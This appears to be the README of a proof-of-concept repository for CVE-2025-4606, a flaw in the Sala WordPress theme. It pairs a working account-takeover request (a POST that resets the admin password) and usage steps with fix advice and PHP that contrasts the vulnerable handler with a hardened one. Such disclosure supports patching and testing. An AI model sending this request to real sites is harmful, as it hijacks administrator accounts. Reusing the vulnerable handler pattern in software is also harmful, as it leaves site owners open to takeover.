# CVE-2025-4606 - Sala – Startup & SaaS WordPress Theme <= 1.1.4 - Unauthenticated Privilege Escalation via Password Reset/Account Takeover
🔥 **Vulnerability Summary**
The Sala WordPress theme, in versions up to and including 1.1.4, is vulnerable to **unauthenticated privilege escalation** via password reset. An **unauthenticated attacker** can reset the password of any user, including administrators, by sending a single request to an exposed AJAX endpoint; the endpoint never verifies who is making the request or whether they own the account being changed.
The root cause is the `change_password_ajax` handler, which is hooked to `wp_ajax_nopriv_change_password_ajax` and is therefore reachable by visitors with no session at all. Given any valid user login it sets a new password for that account without a nonce check, without requiring a logged-in session, and without any reset key or proof that the requester controls the account.
🔍 **Affected Theme**
- **Theme Name:** Sala – Startup & SaaS WordPress Theme
- **Affected Version:** <= 1.1.4
- **Vulnerability Type:** Unauthenticated Privilege Escalation
- **CVE ID:** CVE-2025-4606
- **CVSS Score:** 9.8 (Critical)
- **Impact:** Complete Account Takeover (Including Admin)
🧪 **Exploit Features**
- 🔓 **No authentication required**
- 🔄 **Overwrites any user’s password** by providing a valid login name
- 📬 **Targets the AJAX endpoint** `/wp-admin/admin-ajax.php?action=change_password_ajax`
- 🧠 **Works instantly** if the attacker knows a valid username (e.g., admin)
🧠 **Researcher**
- Credit: [Thai An](https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thai-an-thai-an)
🚀 **Usage**
1. Identify a valid username on the target WordPress site. One public source is the author archive URL (`/author/username`). Note that the slug in that URL is the user's `user_nicename`, which WordPress derives from the login name but which can differ from it; the `login` parameter below must be the actual login name.
2. Send the following POST request to reset the user's password:
```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: targetsite.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 62

action=change_password_ajax&login=admin&new_password=hacked123
```
3. If the endpoint reports success, the target user's password has been replaced with the value of `new_password` (`hacked123` in the example above); the change takes effect immediately.
4. Confirm by logging in at `/wp-login.php` with the target username and the new password.
🛠 **Fix Recommendations**
- Theme developers should remove the `wp_ajax_nopriv_change_password_ajax` registration entirely: a password-change action has no legitimate anonymous use. The logged-in `wp_ajax_change_password_ajax` variant still needs the checks below.
- Require a logged-in session (`is_user_logged_in()`) and only ever change the password of the current user (`get_current_user_id()`); never accept the target login from the request. For a genuine "forgot password" feature, rely on core's reset-key flow (`retrieve_password()` / `check_password_reset_key()`) rather than a custom setter.
- Verify a nonce with `check_ajax_referer()` so the logged-in endpoint cannot be driven cross-site (CSRF).
- Require the current password before accepting a new one, and invalidate existing sessions after the change so a session an attacker already holds does not survive it.
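The following PHP is an added illustration and is not the Sala theme's code, nor part of the PoC repository. The first handler reconstructs the pattern this advisory describes (an anonymous AJAX action that sets a password for whatever login it is given, using the `login` and `new_password` parameter names from the request above); the second is a hardened handler that applies the recommendations listed. Function names and the nonce action `example_change_password` are assumptions.

```php
<?php
/*
 * Added example, not the Sala theme's code. The first handler reconstructs the
 * vulnerable pattern the advisory describes; the second shows the checks the
 * fix recommendations call for. Function and nonce-action names are assumptions;
 * the "login" and "new_password" parameter names follow the request in Usage.
 */

/* --- Vulnerable pattern (for contrast only; never ship this) --- */
function example_change_password_ajax_vulnerable() {
    $login        = isset( $_POST['login'] ) ? sanitize_user( wp_unslash( $_POST['login'] ) ) : '';
    $new_password = isset( $_POST['new_password'] ) ? (string) wp_unslash( $_POST['new_password'] ) : '';

    // The *attacker* chooses the victim: any login name from the request is accepted.
    $user = get_user_by( 'login', $login );
    if ( ! $user ) {
        wp_send_json_error( 'invalid user' );
    }

    // No nonce, no is_user_logged_in(), no proof the caller owns this account,
    // no reset key: the stored password is simply overwritten.
    wp_set_password( $new_password, $user->ID );
    wp_send_json_success( 'password changed' );
}
// The vulnerable pattern registers the handler for BOTH logged-in and anonymous
// callers; the nopriv line is what makes the bug unauthenticated. Left commented
// out here so that only the hardened handler is hooked when this file is loaded.
// add_action( 'wp_ajax_change_password_ajax',        'example_change_password_ajax_vulnerable' );
// add_action( 'wp_ajax_nopriv_change_password_ajax', 'example_change_password_ajax_vulnerable' );

/* --- Hardened handler --- */
function example_change_password_ajax_secure() {
    // CSRF: the request must carry a nonce created with
    // wp_create_nonce( 'example_change_password' ) in a field named _ajax_nonce.
    // check_ajax_referer() terminates the request if it is missing or invalid.
    check_ajax_referer( 'example_change_password', '_ajax_nonce' );

    // Authentication: this handler is deliberately NOT hooked to wp_ajax_nopriv_,
    // but check anyway so the function stays safe if someone adds that hook later.
    if ( ! is_user_logged_in() ) {
        wp_send_json_error( 'authentication required', 401 );
    }

    // Authorization: the only account a caller may change is their own.
    // Any "login" parameter in the request is ignored on purpose.
    $user = wp_get_current_user();

    // Proof of possession: require the current password before accepting a new one.
    $current = isset( $_POST['current_password'] ) ? (string) wp_unslash( $_POST['current_password'] ) : '';
    if ( ! wp_check_password( $current, $user->user_pass, $user->ID ) ) {
        wp_send_json_error( 'current password is incorrect', 403 );
    }

    $new_password = isset( $_POST['new_password'] ) ? (string) wp_unslash( $_POST['new_password'] ) : '';
    if ( strlen( $new_password ) < 12 ) { // assumed minimum length; apply your own policy
        wp_send_json_error( 'new password is too short', 400 );
    }

    wp_set_password( $new_password, $user->ID );

    // Auth cookies are keyed on a fragment of the old password hash, so they stop
    // validating now anyway; also drop every stored session token so a session an
    // attacker already held cannot survive, and make the caller log in again.
    wp_destroy_all_sessions();
    wp_send_json_success( 'password changed, please log in again' );
}
// Logged-in callers only. There is intentionally no wp_ajax_nopriv_ registration.
add_action( 'wp_ajax_change_password_ajax', 'example_change_password_ajax_secure' );
```

With the hardened handler in place, the request from the Usage section fails at `check_ajax_referer()` (no nonce) before any user lookup happens, and even a valid nonce plus a logged-in session can only change the caller's own password after proving the current one.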
🔒 **Disclaimer:**
This information is provided for educational and authorized penetration testing purposes only. Unauthorized exploitation of systems is illegal and unethical.
📚 **Reference:**
- [Wordfence Advisory](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/sala/sala-startup-saas-wordpress-theme-114-unauthenticated-privilege-escalation-via-password-resetaccount-takeover)
📁 **Repository Contents**
```text
.
├── [ 758] exp.py
└── [2.7K] README.md
```